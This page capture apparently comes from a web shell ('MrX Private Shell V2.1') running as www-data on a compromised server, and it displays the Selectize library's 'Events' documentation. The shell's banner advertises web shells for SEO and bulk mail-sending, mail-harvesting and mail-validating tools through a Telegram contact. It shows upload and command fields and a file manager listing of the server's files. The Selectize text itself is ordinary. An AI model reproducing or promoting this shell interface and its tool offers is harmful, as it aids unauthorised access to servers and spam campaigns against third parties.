__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.148: ~ $
## Selectize API – Events

In the [usage documentation](usage.md), a few callbacks are listed that
allow you to listen for certain events. Callbacks aren't always ideal though;
specifically when you wish to have multiple handlers.

Selectize instances have a basic event emitter interface that mimics jQuery, Backbone.js, et al:

```js
var handler = function() { /* ... */ };
selectize.on('event_name', handler);
selectize.off('event_name');
selectize.off('event_name', handler);
```

### List of Events

<table width="100%">
	<tr>
		<th valign="top" width="200px" align="left">Event</th>
		<th valign="top" width="150px" align="left">Params</th>
		<th valign="top" align="left">Description</th>
	</tr>
	<tr>
		<td valign="top"><code>"initialize"</code></td>
		<td valign="top"></td>
		<td valign="top">Invoked once the control is completely initialized.</td>
	</tr>
	<tr>
		<td valign="top"><code>"change"</code></td>
		<td valign="top"><code>value</code></td>
		<td valign="top">Invoked when the value of the control changes.</td>
	</tr>
	<tr>
		<td valign="top"><code>"focus"</code></td>
		<td valign="top"></td>
		<td valign="top">Invoked when the control gains focus.</td>
	</tr>
	<tr>
		<td valign="top"><code>"blur"</code></td>
		<td valign="top"></td>
		<td valign="top">Invoked when the control loses focus.</td>
	</tr>
	<tr>
		<td valign="top"><code>"item_add"</code></td>
		<td valign="top"><code>value</code>, <code>$item</code></td>
		<td valign="top">Invoked when an item is selected.</td>
	</tr>
	<tr>
		<td valign="top"><code>"item_remove"</code></td>
		<td valign="top"><code>value</code>, <code>$item</code></td>
		<td valign="top">Invoked when an item is deselected.</td>
	</tr>
	<tr>
		<td valign="top"><code>"clear"</code></td>
		<td valign="top"></td>
		<td valign="top">Invoked when the control is manually cleared via the clear() method.</td>
	</tr>
	<tr>
		<td valign="top"><code>"option_add"</code></td>
		<td valign="top"><code>value</code>, <code>data</code></td>
		<td valign="top">Invoked when a new option is added to the available options list.</td>
	</tr>
	<tr>
		<td valign="top"><code>"option_remove"</code></td>
		<td valign="top"><code>value</code></td>
		<td valign="top">Invoked when an option is removed from the available options.</td>
	</tr>
    <tr>
        <td valign="top"><code>"option_clear"</code></td>
        <td valign="top"></td>
        <td valign="top">Invoked when all options are removed from the control.</td>
    </tr>
    <tr>
        <td valign="top"><code>"optgroup_add"</code></td>
        <td valign="top"><code>id</code>, <code>data</code></td>
        <td valign="top">Invoked when a new option is added to the available options list.</td>
    </tr>
    <tr>
        <td valign="top"><code>"optgroup_remove"</code></td>
        <td valign="top"><code>id</code></td>
        <td valign="top">Invoked when an option group is removed.</td>
    </tr>
    <tr>
        <td valign="top"><code>"optgroup_clear"</code></td>
        <td valign="top"></td>
        <td valign="top">Invoked when all option groups are removed.</td>
    </tr>
	<tr>
		<td valign="top"><code>"dropdown_open"</code></td>
		<td valign="top"><code>$dropdown</code></td>
		<td valign="top">Invoked when the dropdown opens.</td>
	</tr>
	<tr>
		<td valign="top"><code>"dropdown_close"</code></td>
		<td valign="top"><code>$dropdown</code></td>
		<td valign="top">Invoked when the dropdown closes.</td>
	</tr>
	<tr>
		<td valign="top"><code>"type"</code></td>
		<td valign="top"><code>str</code></td>
		<td valign="top">Invoked when the user types while filtering options.</td>
	</tr>
	<tr>
		<td valign="top"><code>"load"</code></td>
		<td valign="top"><code>data</code></td>
		<td valign="top">Invoked when new options have been loaded and added to the control (via the <code>load</code>  option or <code>load</code>  API method).</td>
	</tr>
	<tr>
		<td valign="top"><code>"destroy"</code></td>
		<td valign="top"></td>
		<td valign="top">Invoked right before the control is destroyed.</td>
	</tr>
</table>

Filemanager

Name Type Size Permission Actions
api.md.gz File 2.36 KB 0644
changelog.Debian.gz File 713 B 0644
changelog.gz File 1.03 KB 0644
copyright File 2.73 KB 0644
events.md File 3.95 KB 0644
plugins.md File 2.65 KB 0644
usage.md.gz File 4.35 KB 0644
Filemanager